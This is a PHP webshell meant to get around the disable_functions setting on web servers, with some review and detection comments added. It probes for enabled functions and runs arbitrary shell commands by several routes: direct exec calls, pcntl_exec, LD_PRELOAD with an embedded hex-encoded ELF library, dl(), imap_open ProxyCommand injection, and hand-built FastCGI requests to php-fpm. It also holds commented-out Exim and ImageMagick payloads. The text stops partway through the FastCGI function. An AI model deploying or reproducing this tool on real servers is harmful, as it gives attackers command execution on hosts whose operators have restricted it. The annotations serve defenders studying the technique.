<?php
// Hide E_NOTICE only; warnings and errors still reach the configured log/output.
error_reporting(E_ALL ^ E_NOTICE);
/*
* Bypass disable function shell
*
* Github项目地址: https://github.com/l3m0n/Bypass_Disable_functions_Shell
*
* 仅限安全测试, 请勿用于非法途径
*
*/
// Integer width (see is_x64() below) selects which embedded shared object is used later.
// NOTE(review): ARCH, OS, WRITE_DIR and FAILURE are passed to define() as bare
// identifiers rather than quoted strings.
if(is_x64()){
    define(ARCH, 64);
}else{
    define(ARCH, 32);
}
// First three letters of PHP_OS: WIN -> Windows, DAR -> Darwin, anything else -> Linux.
$OS = strtoupper(substr(PHP_OS,0,3));
if($OS === 'WIN') {
    define(OS, 'Windows');
}elseif ($OS === 'DAR'){
    define(OS, 'Darwin');
}else{
    define(OS, 'Linux');
}
unset($OS);
// Every file this script drops (command scripts, result files, shared objects)
// goes under the system temp dir; watching that directory is the simplest
// detection point for all techniques below.
define(WRITE_DIR, sys_get_temp_dir() . DIRECTORY_SEPARATOR);
// Sentinel returned by most command helpers below when their technique is unavailable.
define(FAILURE, '3ee28fe1a60c95b89d29317f122c7021');
// Server configuration echoed in the page footer.
$disable_function_str = get_cfg_var("disable_functions");
$disable_function_arr = explode(",",$disable_function_str);
// Functions whose availability is probed and printed below.
$vul_function_str = 'dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,error_log,mb_send_mail,putenv,ini_set,apache_setenv,symlink,link';
$vul_function_arr = explode(",", $vul_function_str);
$open_basedir = get_cfg_var("open_basedir");
// NOTE(review): PHP_SELF can carry request-controlled PATH_INFO and is
// interpolated unescaped into the form action in the footer.
$myscript = $_SERVER['PHP_SELF'];
$GLOBALS["system_so_x64"] = "7f454c4602010100000000000000000003003e0001000000c006000000000000400000000000000028140000000000000000000040003800060040001c001900010000000500000000000000000000000000000000000000000000000000000004090000000000000409000000000000000020000000000001000000060000000809000000000000080920000000000008092000000000005802000000000000600200000000000000002000000000000200000006000000280900000000000028092000000000002809200000000000c001000000000000c0010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050e57464040000008408000000000000840800000000000084080000000000001c000000000000001c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000040000001400000003000000474e550066bb9e247f3731670b5cdfd534ac53233e576aef00000000030000000d000000010000000600000088c22001001440090d0000000f000000110000004245d5ecbbe3927cd871581cb98df10eead3ef0e6d1287c2000000000000000000000000000000000000000000000000000000000000000003000900380600000000000000000000000000007d00000012000000000000000000000000000000000000001c00000020000000000000000000000000000000000000008b00000012000000000000000000000000000000000000009d00000021000000000000000000000000000000000000000100000020000000000000000000000000000000000000009e00000011000000000000000000000000000000000000006100000020000000000000000000000000000000000000009c0000001100000000000000000000000000000000000000380000002000000000000000000000000000000000000000520000002200000000000000000000000000000000000000840000001200000000000000000000000000000000000000a600000010001600600b2000000000000000000000000000b900000010001700680b2000000000000000000000000000ad00000010001700600b20000000000000000000000000001000000012000900380600000000000000000000000000001600000012000c00600800000000000000000000000000007500000012000b00c0070000000000009d00000000000000005f5f676d6f6e5f73746172745f5f005f696e6974005f66696
e69005f49544d5f64657265676973746572544d436c6f6e655461626c65005f49544d5f7265676973746572544d436c6f6e655461626c65005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573007072656c6f616400676574656e76007374727374720073797374656d006c6962632e736f2e36005f5f656e7669726f6e005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e3500000000000200000002000200000002000000020000000200020001000100010001000100010001000100920000001000000000000000751a690900000200be00000000000000080920000000000008000000000000009007000000000000180920000000000008000000000000005007000000000000580b2000000000000800000000000000580b200000000000100920000000000001000000120000000000000000000000e80a20000000000006000000030000000000000000000000f00a20000000000006000000060000000000000000000000f80a20000000000006000000070000000000000000000000000b20000000000006000000080000000000000000000000080b200000000000060000000a0000000000000000000000100b200000000000060000000b0000000000000000000000300b20000000000007000000020000000000000000000000380b20000000000007000000040000000000000000000000400b20000000000007000000060000000000000000000000480b200000000000070000000b0000000000000000000000500b200000000000070000000c00000000000000000000004883ec08488b05ad0420004885c07405e8430000004883c408c30000000000000000000000000000ff35ba042000ff25bc0420000f1f4000ff25ba0420006800000000e9e0ffffffff25b20420006801000000e9d0ffffffff25aa0420006802000000e9c0ffffffff25a20420006803000000e9b0ffffffff259a0420006804000000e9a0ffffff488d3d99042000488d0599042000554829f84889e54883f80e7615488b05060420004885c074095dffe0660f1f4400005dc366666666662e0f1f840000000000488d3d59042000488d3552042000554829fe4889e548c1fe034889f048c1e83f4801c648d1fe7418488b05d90320004885c0740c5dffe0660f1f8400000000005dc366666666662e0f1f840000000000803d0904200000752748833daf03200000554889e5740c488b3dea032000e82dffffffe848ffffff5dc605e003200001f3c366666666662e0f1f840000000000488d3d8901200048833f00750be95effffff660f1f440000488b05510320004885c074e9554889e5ffd05de940ffffff554
889e54883ec10488d3d9a000000e89cfeffff488945f0c745fc00000000eb4f488b0510032000488b008b55fc4863d248c1e2034801d0488b00488d35740000004889c7e8a6feffff4885c0741d488b05e2022000488b008b55fc4863d248c1e2034801d0488b00c600008345fc01488b05c1022000488b008b55fc4863d248c1e2034801d0488b004885c07592488b45f04889c7e825feffffc9c30000004883ec084883c408c34556494c5f434d444c494e45004c445f5052454c4f414400000000011b033b1800000002000000dcfdffff340000003cffffff5c0000001400000000000000017a5200017810011b0c070890010000240000001c000000a0fdffff60000000000e10460e184a0f0b770880003f1a3b2a332422000000001c00000044000000d8feffff9d00000000410e108602430d0602980c0708000000000000000000009007000000000000000000000000000050070000000000000000000000000000010000000000000092000000000000000c0000000000000038060000000000000d000000000000006008000000000000190000000000000008092000000000001b0000000000000010000000000000001a0000000000000018092000000000001c000000000000000800000000000000f5feff6f00000000b8010000000000000500000000000000c0030000000000000600000000000000f8010000000000000a00000000000000ca000000000000000b0000000000000018000000000000000300000000000000180b20000000000002000000000000007800000000000000140000000000000007000000000000001700000000000000c0050000000000000700000000000000d0040000000000000800000000000000f00000000000000009000000000000001800000000000000feffff6f00000000b004000000000000ffffff6f000000000100000000000000f0ffff6f000000008a04000000000000f9ffff6f0000000003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000280920000000000000000000000000000000000000000000760600000000000086060000000000009606000000000000a606000000000000b606000000000000580b2000000000004743433a202844656269616e20342e392e322d31302b6465623875322920342e392e3200002e73796d746162002e737472746162002e7368737472746162002e6e6f74652e676e752e6
275696c642d6964002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e696e69745f6172726179002e66696e695f6172726179002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e740000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200b80100000000000000000000000000000000000003000300f80100000000000000000000000000000000000003000400c003000000000000000000000000000000000000030005008a0400000000000000000000000000000000000003000600b00400000000000000000000000000000000000003000700d00400000000000000000000000000000000000003000800c00500000000000000000000000000000000000003000900380600000000000000000000000000000000000003000a00600600000000000000000000000000000000000003000b00c00600000000000000000000000000000000000003000c00600800000000000000000000000000000000000003000d00690800000000000000000000000000000000000003000e00840800000000000000000000000000000000000003000f00a00800000000000000000000000000000000000003001000080920000000000000000000000000000000000003001100180920000000000000000000000000000000000003001200200920000000000000000000000000000000000003001300280920000000000000000000000000000000000003001400e80a20000000000000000000000000000000000003001500180b20000000000000000000000000000000000003001600580b20000000000000000000000000000000000003001700600b2000000000000000000000000000000000000300180000000000000000000000000000000000010000000400f1ff000000000000000000000000000000000c00000001001200200920000000000000000000000000001900000002000b00c00600000000000000000000000000002e00000002000b00000700000000000000000000000000004100000002000b00500700000000000000000000000000005700000001001700600b20000000000001000000000000006600000001001100180920000000000000000000000000008d00000002000b0090070000000000000000000000000000990
000000100100008092000000000000000000000000000b80000000400f1ff00000000000000000000000000000000010000000400f1ff00000000000000000000000000000000cd00000001000f0000090000000000000000000000000000db0000000100120020092000000000000000000000000000000000000400f1ff00000000000000000000000000000000e700000001001600580b2000000000000000000000000000f40000000100130028092000000000000000000000000000fd00000001001600600b20000000000000000000000000000901000001001500180b20000000000000000000000000001f01000012000000000000000000000000000000000000003301000020000000000000000000000000000000000000004f01000010001600600b20000000000000000000000000005601000012000c00600800000000000000000000000000005c01000012000000000000000000000000000000000000007001000020000000000000000000000000000000000000007f01000011000000000000000000000000000000000000009401000010001700680b20000000000000000000000000009901000010001700600b2000000000000000000000000000a501000012000b00c0070000000000009d00000000000000ad0100002000000000000000000000000000000000000000c10100001100000000000000000000000000000000000000d80100002000000000000000000000000000000000000000f201000022000000000000000000000000000000000000000e02000012000900380600000000000000000000000000001402000012000000000000000000000000000000000000000063727473747566662e63005f5f4a43525f4c4953545f5f00646572656769737465725f746d5f636c6f6e65730072656769737465725f746d5f636c6f6e6573005f5f646f5f676c6f62616c5f64746f72735f61757800636f6d706c657465642e36363730005f5f646f5f676c6f62616c5f64746f72735f6175785f66696e695f61727261795f656e747279006672616d655f64756d6d79005f5f6672616d655f64756d6d795f696e69745f61727261795f656e747279006279706173735f64697361626c6566756e632e63005f5f4652414d455f454e445f5f005f5f4a43525f454e445f5f005f5f64736f5f68616e646c65005f44594e414d4943005f5f544d435f454e445f5f005f474c4f42414c5f4f46465345545f5441424c455f00676574656e764040474c4942435f322e322e35005f49544d5f64657265676973746572544d436c6f6e655461626c65005f6564617461005f66696e690073797374656d4040474c4942435f322e322e35005f5f676d6f6e5f73746
172745f5f00656e7669726f6e4040474c4942435f322e322e35005f656e64005f5f6273735f7374617274007072656c6f6164005f4a765f5265676973746572436c6173736573005f5f656e7669726f6e4040474c4942435f322e322e35005f49544d5f7265676973746572544d436c6f6e655461626c65005f5f6378615f66696e616c697a654040474c4942435f322e322e35005f696e6974007374727374724040474c4942435f322e322e3500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001b0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002e000000f6ffff6f0200000000000000b801000000000000b8010000000000003c00000000000000030000000000000008000000000000000000000000000000380000000b0000000200000000000000f801000000000000f801000000000000c80100000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000c003000000000000c003000000000000ca0000000000000000000000000000000100000000000000000000000000000048000000ffffff6f02000000000000008a040000000000008a04000000000000260000000000000003000000000000000200000000000000020000000000000055000000feffff6f0200000000000000b004000000000000b004000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000d004000000000000d004000000000000f0000000000000000300000000000000080000000000000018000000000000006e000000040000004200000000000000c005000000000000c0050000000000007800000000000000030000000a0000000800000000000000180000000000000078000000010000000600000000000000380600000000000038060000000000001a00000000000000000000000000000004000000000000000000000000000000730000000100000006000000000000006006000000000000600600000000000060000000000000000000000000000000100000000000000010000000000000007e000000010000000600000000000000c006000000000000c0060000000000009d010000000000000000000000000000100000000000000000000000000000008400000001000000060000000000000060080000000000006008000000000000090000000000000000000000000000000400000000000000000
00000000000008a00000001000000020000000000000069080000000000006908000000000000180000000000000000000000000000000100000000000000000000000000000092000000010000000200000000000000840800000000000084080000000000001c00000000000000000000000000000004000000000000000000000000000000a0000000010000000200000000000000a008000000000000a0080000000000006400000000000000000000000000000008000000000000000000000000000000aa0000000e0000000300000000000000080920000000000008090000000000001000000000000000000000000000000008000000000000000000000000000000b60000000f0000000300000000000000180920000000000018090000000000000800000000000000000000000000000008000000000000000000000000000000c2000000010000000300000000000000200920000000000020090000000000000800000000000000000000000000000008000000000000000000000000000000c700000006000000030000000000000028092000000000002809000000000000c001000000000000040000000000000008000000000000001000000000000000d0000000010000000300000000000000e80a200000000000e80a0000000000003000000000000000000000000000000008000000000000000800000000000000d5000000010000000300000000000000180b200000000000180b0000000000004000000000000000000000000000000008000000000000000800000000000000de000000010000000300000000000000580b200000000000580b0000000000000800000000000000000000000000000008000000000000000000000000000000e4000000080000000300000000000000600b200000000000600b0000000000000800000000000000000000000000000001000000000000000000000000000000e90000000100000030000000000000000000000000000000600b0000000000002400000000000000000000000000000001000000000000000100000000000000110000000300000000000000000000000000000000000000840b000000000000f200000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000780c00000000000088050000000000001b0000002b0000000800000000000000180000000000000009000000030000000000000000000000000000000000000000120000000000002802000000000000000000000000000001000000000000000000000000000000";
$GLOBALS["system_so_x32"] = "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";
// Placeholders for a loadable PHP extension; both are empty in this listing,
// so dl_exec() below writes a zero-length php.so.
$GLOBALS["php_so_x64"] = "";
$GLOBALS["php_so_x32"] = "";
//$plugin_func_arr = array(
// "common_exec_cmd" => array("exec", "shell_exec", "system", "passthru", "popen", "proc_open"),
// "load_so" => array("dl"),
// "ld_preload_so" => array("mail", "error_log", "imap_mail", "mb_send_mail"),
// "shellshock" => array("mail"),
// "apache_mod_cgi" => array(),
// "imagick" => array(),
// "pwn" => array(),
//);
// Report the environment and probe which execution-capable functions are callable.
echo "Temp Dir:" . WRITE_DIR . "<br>";
echo "Arch: " . ARCH . "; OS: " . OS . "<br><br>";
foreach ($vul_function_arr as $func) {
    // function_exists() is false both for names listed in disable_functions
    // and for extensions that are not loaded, so "no exist" does not say which.
    if (function_exists($func)){
        echo "<font style='color: red'>Exist: ".$func."</font><br>";
    } else {
        echo "no exist: ".$func."<br>";
    }
}
/**
 * Read a whole file.
 *
 * Uses file_get_contents() when it is callable, otherwise an fopen()/fread()
 * loop in 1000-byte chunks. When neither path is available the message
 * "no read function" is echoed and null is returned.
 *
 * @param string $filename path to read
 * @return string|false|null file content, false on a file_get_contents() failure,
 *                           null when no read function is callable
 */
function read_file($filename){
    if(function_exists('file_get_contents')){
        return file_get_contents($filename);
    }
    if (!function_exists('fopen') || !function_exists('fread')) {
        echo "no read function";
        return;
    }
    $fh = fopen($filename, 'r');
    $buf = '';
    for (;;) {
        if (feof($fh)) {
            break;
        }
        $buf .= fread($fh, 1000);
    }
    fclose($fh);
    return $buf;
}
/**
 * Write $content to $filename, replacing any existing content.
 *
 * $model is accepted for call compatibility only; it is not used. When
 * file_put_contents() is not callable the message "no write function" is
 * echoed instead.
 *
 * @param string $filename path to write
 * @param string $content  data to store
 * @param string $model    unused
 * @return void
 */
function write_file($filename, $content, $model="w"){
    if (!function_exists('file_put_contents')) {
        echo "no write function";
        return;
    }
    file_put_contents($filename, $content);
}
/**
 * Build a string of $len printable ASCII characters (codes 33..126) drawn
 * from mt_rand(). Not used elsewhere in this file; mt_rand() is not a CSPRNG.
 *
 * @param int $len number of characters (0 yields '')
 * @return string
 */
function random_str($len = 8) {
    $out = '';
    $remaining = $len;
    while ($remaining > 0) {
        $out .= chr(mt_rand(33, 126));
        $remaining--;
    }
    return $out;
}
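/**
 * Whether this PHP build uses 64-bit integers.
 *
 * The original compared intval("9223372036854775807") with the same literal;
 * intval() saturates to PHP_INT_MAX on either build, so the "error" string
 * branch was unreachable and the function mixed bool and string returns.
 * PHP_INT_SIZE expresses the same test directly and always yields a bool.
 *
 * @return bool true on a 64-bit build, false on a 32-bit build
 */
function is_x64() {
    return PHP_INT_SIZE === 8;
}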
/**
 * Append a shell redirection so the command's output lands in $outfile.
 *
 * On Windows only stdout is redirected; elsewhere stderr is merged with "2>&1".
 * Neither $cmd nor $outfile is quoted or escaped.
 *
 * @param string $cmd     command line
 * @param string $outfile path the output should be written to
 * @return string the redirected command line
 */
function trans_cmd($cmd, $outfile){
    if (OS == 'Windows'){
        $cmd = $cmd . " > " . $outfile;
    }else{
        $cmd = $cmd . " > " . $outfile . " 2>&1";
    }
    return $cmd;
}
/**
 * Write the redirected command line to WRITE_DIR/$file (a dropped file that
 * is never removed by this function) and return both paths.
 *
 * @param string $cmd    command line
 * @param string $file   file name for the command script, under WRITE_DIR
 * @param string $result file name for the output, under WRITE_DIR
 * @return array{0:string,1:string} [command file path, result file path]
 */
function send_cmd_to_file($cmd, $file = 'cmd', $result = 'result') {
    $outfile = WRITE_DIR . $result;
    $cmdfile = WRITE_DIR . $file;
    $cmd = trans_cmd($cmd, $outfile);
    write_file($cmdfile, $cmd);
    return array(
        $cmdfile,
        $outfile
    );
}
/**
 * Build the redirected command line for a result file under WRITE_DIR
 * without writing anything to disk.
 *
 * @param string $cmd    command line
 * @param string $result file name for the output, under WRITE_DIR
 * @return array{0:string,1:string} [redirected command line, result file path]
 */
function send_cmd($cmd, $result = 'result') {
    $outfile = WRITE_DIR . $result;
    $cmd = trans_cmd($cmd, $outfile);
    return array(
        $cmd,
        $outfile
    );
}
/**
 * Read the result file, delete it (errors suppressed) and return its content.
 *
 * Unlike the name-only $result of send_cmd(), callers pass a full path here
 * (the second element returned by send_cmd()/send_cmd_to_file()).
 *
 * @param string $result path of the result file
 * @return string|false|null whatever read_file() returned
 */
function recv_result($result = 'result') {
    $ret = read_file($result);
    @unlink($result);
    return $ret;
}
/**
 * Send $data to a socket and return everything read back until EOF.
 *
 * With stream_socket_client() available, a $host containing "unix://" is
 * used verbatim as the address, otherwise "tcp://$host:$port" is dialled.
 * The fallback is fsockopen() with a 30 s connect timeout. Returns FAILURE
 * when neither function is callable or the connection fails.
 *
 * @param string $data bytes to write
 * @param string $host host name, IP, or unix:// socket path
 * @param int    $port TCP port, ignored for unix:// addresses
 * @return string the raw response, or FAILURE
 */
function send_socket($data, $host, $port=9000) {
    if ( function_exists('stream_socket_client') ) {
        if (strpos($host,'unix://') !== false) {
            $client = $host;
        } else {
            $client = 'tcp://' . $host . ':' . $port;
        }
        $fp = stream_socket_client($client);
    } elseif (function_exists('fsockopen')) {
        $fp = fsockopen($host, $port, $errno, $errstr, 30);
    } else {
        return FAILURE;
    }
    if ($fp) {
        $content = "";
        fwrite($fp, $data);
        // Read until the peer closes; no read timeout is set on the stream.
        while (!feof($fp)) {
            $content .= fgets($fp, 4096);
        }
        fclose($fp);
        return $content;
    } else {
        return FAILURE;
    }
}
/*
* 第一种: 常规绕过, 寻找漏掉的命令执行函数, 适用于windows + linux
* exec、shell_exec、system、passthru、popen、proc_open
*/
/**
 * Run $cmd through the first natively callable execution function and return
 * its output, or FAILURE when none is available.
 *
 * Probe order: exec (lines re-joined with "\n"), shell_exec, system and
 * passthru (captured with output buffering), popen (probed by calling it
 * under "@" rather than with function_exists()), proc_open. Every call is
 * wrapped in "@", so a failure of the chosen function is silent and yields an
 * empty string rather than FAILURE.
 *
 * Detection note: this is exactly the check that finds the one function a
 * partial disable_functions list leaves out; the list should cover all six.
 *
 * @param string $cmd command line
 * @return string the captured output, or FAILURE
 */
function common_exec_cmd($cmd) {
    $res = '';
    if (function_exists('exec')) {
        // exec() returns output as an array of lines.
        @exec($cmd, $res);
        $res = join("\n", $res);
    } elseif (function_exists('shell_exec')) {
        $res = @shell_exec($cmd);
    } elseif (function_exists('system')) {
        // system()/passthru() print directly; capture via the output buffer.
        @ob_start();
        @system($cmd);
        $res = @ob_get_contents();
        @ob_end_clean();
    } elseif (function_exists('passthru')) {
        @ob_start();
        @passthru($cmd);
        $res = @ob_get_contents();
        @ob_end_clean();
    } elseif (@is_resource($f = @popen($cmd, "r"))) {
        $res = '';
        while (!@feof($f)) {$res .= @fread($f, 1024);}
        @pclose($f);
    } elseif (function_exists('proc_open')) {
        $descriptorspec = array(
            0 => array("pipe", "r"),
            1 => array("pipe", "w"),
            2 => array("pipe", "w")
        );
        $process = proc_open($cmd, $descriptorspec, $pipes, null, null);
        if (is_resource($process)) {
            // Single-quoted: the literal text $stdin is written to the child's stdin.
            fwrite($pipes[0], '$stdin');
            fclose($pipes[0]);
            // Only stdout is collected; the stderr pipe is neither read nor closed.
            $res = stream_get_contents($pipes[1]);
        }else{
            return FAILURE;
        }
    } else {
        return FAILURE;
    }
    return $res;
}
/*
* 第二种: pcntl_exec绕过
*/
/**
 * Run $cmd by writing it to WRITE_DIR/cmd.sh and handing that script to
 * /bin/bash via pcntl_exec().
 *
 * pcntl_exec() replaces the current process image on success, so the
 * recv_result() call below is only reached when the exec itself fails; the
 * result file is otherwise left behind in the temp dir. Returns FAILURE when
 * pcntl_exec() is not callable.
 *
 * @param string $cmd command line
 * @return string|false|null result file content on exec failure, or FAILURE
 */
function pcntl_exec_cmd($cmd) {
    if (function_exists('pcntl_exec')) {
        $cmd_arr = send_cmd_to_file($cmd, 'cmd.sh');
        pcntl_exec("/bin/bash", array($cmd_arr[0]));
        return recv_result($cmd_arr[1]);
    } else {
        return FAILURE;
    }
}
//echo pcntl_exec_cmd("id");
/*
* 第三种: ld_preload绕过: 仅限Linux
* mail、imap_mail、error_log、mb_send_mail
* From: https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD/
*/
/**
 * Run $cmd via LD_PRELOAD injection into a child process spawned by a
 * mail-sending function; Linux only.
 *
 * Writes the embedded ELF (system_so_x64 / system_so_x32, chosen by ARCH) to
 * WRITE_DIR/system.so, exports EVIL_CMDLINE and LD_PRELOAD with putenv(), and
 * then calls the first available of error_log() (type 1), mail(),
 * mb_send_mail() or imap_mail(), each of which is expected to spawn a
 * sendmail child that inherits that environment. The .so's symbol table
 * (imports getenv, strstr, system, __environ; source name
 * bypass_disablefunc.c) suggests it runs EVIL_CMDLINE via system(). The .so is
 * removed afterwards and the result file read back; FAILURE is returned when
 * no trigger function is callable.
 *
 * Detection/mitigation: the temp-dir drop, a putenv() of LD_PRELOAD and a
 * sendmail child of the PHP worker are all observable; listing putenv in
 * disable_functions removes the technique's prerequisite, and the literal
 * string EVIL_CMDLINE is a usable file/memory indicator.
 *
 * @param string $cmd command line
 * @return string|false|null captured output, or FAILURE
 */
function ld_preload_exec_cmd($cmd) {
    $so_file = WRITE_DIR . 'system.so';
    if (ARCH === 64) {
        write_file($so_file, hex2bin($GLOBALS['system_so_x64']));
    } else {
        write_file($so_file, hex2bin($GLOBALS['system_so_x32']));
    }
    $cmd_arr = send_cmd($cmd, 'result');
    putenv("EVIL_CMDLINE=" . $cmd_arr[0]);
    putenv("LD_PRELOAD=" . $so_file);
    // The recipient literal reads "[email protected]" in this rendering; presumably
    // an address obfuscated by the page renderer.
    if (function_exists('error_log')){
        error_log("", 1, "[email protected]");
    } elseif (function_exists('mail')){
        mail("", "", "", "");
    } elseif (function_exists('mb_send_mail')){
        mb_send_mail("","","");
    } elseif ((function_exists('imap_mail'))){
        imap_mail("","","");
    } else {
        @unlink($so_file);
        return FAILURE;
    }
    // del so file
    @unlink($so_file);
    return recv_result($cmd_arr[1]);
}
//echo ld_preload_exec_cmd($_GET['cmd']);
//$so_file = WRITE_DIR . 'system_x32.so';
//var_dump(bin2hex(read_file($so_file)));
/*
* 第四种: ld加载php扩展:
* ld
* https://github.com/Medicean/as_bypass_php_disable_functions
* https://github.com/AntSwordProject/ant_php_extension
*/
/**
 * Load a PHP extension with dl() and call the function it is expected to
 * provide (antsystem(), which is not defined in this file).
 *
 * Writes hex2bin() of the embedded php_so_* blob (empty in this listing, so
 * a zero-length file) to WRITE_DIR/php.so, but $so_file is then reassigned to
 * "ant_x64.so" before dl(), so the dropped file is neither loaded nor deleted
 * and dl() looks for ant_x64.so in the configured extension_dir instead.
 * Returns FAILURE when dl() is not callable.
 *
 * @param string $cmd command line
 * @return mixed whatever antsystem() returns, or FAILURE
 */
function dl_exec($cmd){
    if(function_exists('dl')){
        $so_file = WRITE_DIR . 'php.so';
        if (ARCH === 64) {
            write_file($so_file, hex2bin($GLOBALS['php_so_x64']));
        } else {
            write_file($so_file, hex2bin($GLOBALS['php_so_x32']));
        }
        $so_file = "ant_x64.so";
        dl($so_file);
        $result = antsystem($cmd);
        // del so file
        @unlink($so_file);
        return $result;
    }else{
        return FAILURE;
    }
}
//echo dl_exec("id");
/*
* 第五种: imap_open: 仅限Linux
*/
/**
 * Run $cmd through the server part of an imap_open() mailbox spec; Linux only.
 *
 * The spec carries a -oProxyCommand option that the IMAP c-client passes to
 * its rsh/ssh invocation; the command is base64-encoded and decoded inside the
 * proxy command, with tabs instead of spaces, so the spec contains no spaces.
 * The output is read from the result file afterwards. Returns FAILURE when
 * imap_open() is not callable.
 *
 * Mitigation: the imap.enable_insecure_rsh ini setting (off by default in
 * current PHP releases) disables the rsh/ssh path this relies on.
 *
 * @param string $cmd command line
 * @return string|false|null captured output, or FAILURE
 */
function imap_open_exec($cmd){
    if (function_exists('imap_open')) {
        $cmd_arr = send_cmd($cmd);
        $server = "x -oProxyCommand=echo\t" . base64_encode($cmd_arr[0]) . "|base64\t-d|sh}";
        imap_open('{' . $server . ':143/imap}INBOX', '', '');
        return recv_result($cmd_arr[1]);
    }else{
        return FAILURE;
    }
}
//echo imap_open_exec("id");
/*
* exim
*/
//function exim_exec($cmd){
// if (function_exists('mail')) {
// $cmd_arr = send_cmd_to_file($cmd);
// $payload = "-be \${run{/bin/bash\${substr{10}{1}{\$tod_log}}".$cmd_arr[0]."}{ok}{error}}";
// mail("a@localhost", "", "", "", $payload);
// return recv_result($cmd_arr[1]);
// }else{
// return FAILURE;
// }
//}
/*
* Imagick类, 选择更加通用的绕过方式吧
*/
//function imagick_exec($cmd){
// if(class_exists('Imagick')){
// $imagick_file = WRITE_DIR . 'img';
//
// $cmd_arr = send_cmd($cmd);
//
// $exploit = <<<EOF
//push graphic-context
//viewbox 0 0 640 480
//fill 'url(https://127.0.0.1/image.jpg"|$cmd_arr[0]")'
//pop graphic-context
//EOF;
// write_file($imagick_file, $exploit);
//
// $thumb = new Imagick();
// $thumb->readImage("$imagick_file");
// $thumb->writeImage(WRITE_DIR . 'tmp');
// $thumb->clear();
// $thumb->destroy();
//
// return recv_result($cmd_arr[1]);
// }else{
// return 'nonono';
// }
//}
/*
* FastCgi:
* 9000 port
* phpx.x-fpm.sock
*
* Fail: windows
*/
/**
 * Hex-encode one byte (two lowercase hex digits); values outside 0..255 wrap
 * modulo 256 exactly as chr() does. Used to build FastCGI record fields.
 *
 * @param int $ptr byte value
 * @return string two hex characters
 */
function p($ptr){
    return sprintf('%02x', $ptr & 0xFF);
}
/**
 * Encode a FastCGI name/value length as hex: a single byte below 128,
 * otherwise four big-endian bytes with the top bit of the first byte set.
 *
 * @param int $len length to encode
 * @return string hex string of 2 or 8 characters
 */
function pnv($len){
    if($len < 128){
        return bin2hex(chr($len));
    }
    $octets = array(
        ($len >> 24) | 0x80,
        ($len >> 16) & 0xFF,
        ($len >> 8) & 0xFF,
        $len & 0xFF,
    );
    $hex = '';
    foreach ($octets as $octet) {
        $hex .= bin2hex(chr($octet));
    }
    return $hex;
}
// 还需要更改具体的fastcgi参数, 目前能在linux下使用
//$host = 'unix:///run/php/php7.3-fpm.sock';
/**
 * Run $cmd by speaking FastCGI directly to a php-fpm listener on $host:$port
 * (or a unix:// socket), bypassing the web server and this process's own
 * disable_functions.
 *
 * Builds FCGI_BEGIN_REQUEST, FCGI_PARAMS and FCGI_STDIN records. The params
 * (hex below) set CONTENT_LENGTH, CONTENT_TYPE, SCRIPT_FILENAME/SCRIPT_NAME/
 * REQUEST_URI = $file, REQUEST_METHOD POST, PHP_VALUE
 * "auto_prepend_file = php://input" and PHP_ADMIN_VALUE
 * "allow_url_include = On", so the worker executes the request body
 * (<?php system(base64_decode(...)); exit(); ?>) in the context of $file,
 * which presumably must be an existing .php path on the target. Returns the
 * raw FastCGI response, or FAILURE from send_socket(). The "< 40" limitation
 * echoed at the top is acknowledged by the author and not handled.
 *
 * Detection/mitigation: php-fpm should listen only on a unix socket owned by
 * the web server user (never on a TCP port reachable from other workloads),
 * and a PHP_ADMIN_VALUE carrying allow_url_include from an unexpected client
 * is a strong indicator of this technique.
 *
 * @param string $cmd  command line
 * @param string $file script path presented as SCRIPT_FILENAME
 * @param string $host php-fpm host, IP, or unix:// socket path
 * @param int    $port php-fpm TCP port, ignored for unix:// addresses
 * @return string raw response records, or FAILURE
 */
function fastcgi_exec($cmd, $file, $host, $port=9000){
    if (strlen($cmd) > 40) {
        echo "Bug: command len need < 40, will be fix.";
    }
    $cmd = base64_encode($cmd);
    $php_code = '<?php system(base64_decode("'.$cmd.'"));exit();?>';
    $php_code_len = strlen($php_code);
    // FCGI_STDIN record header tail: 2-byte content length, padding, reserved.
    $php_code_pad = p(($php_code_len >> 8) & 0xFF) . p($php_code_len & 0xFF) . p(0) . p(0);
    //$uri = bin2hex(__FILE__);
    //$uri = '/var/www/html/shell.php';
    $uri = $file;
    $uri_val_pad = pnv(strlen($uri));
    // Name/value pairs as hex; fixed names and values are pre-encoded.
    $params = '0e02434f4e54454e545f4c454e475448'.bin2hex($php_code_len).'0c10434f4e54454e545f545950456170706c69636174696f6e2f746578740b0452454d4f54455f504f5254393938350b095345525645525f4e414d456c6f63616c686f7374110b474154455741595f494e54455246414345466173744347492f312e300f0e5345525645525f534f4654574152457068702f66636769636c69656e740b0952454d4f54455f414444523132372e302e302e310f'.$uri_val_pad.'5343524950545f46494c454e414d45'.bin2hex($uri).'0b'.$uri_val_pad.'5343524950545f4e414d45'.bin2hex($uri).'091f5048505f56414c55456175746f5f70726570656e645f66696c65203d207068703a2f2f696e7075740e04524551554553545f4d4554484f44504f53540b025345525645525f504f525438300f085345525645525f50524f544f434f4c485454502f312e310c0051554552595f535452494e470f165048505f41444d494e5f56414c5545616c6c6f775f75726c5f696e636c756465203d204f6e0d01444f43554d454e545f524f4f542f0b095345525645525f414444523132372e302e302e310b'.$uri_val_pad.'524551554553545f555249'.bin2hex($uri);
    $params_len = strlen(hex2bin($params));
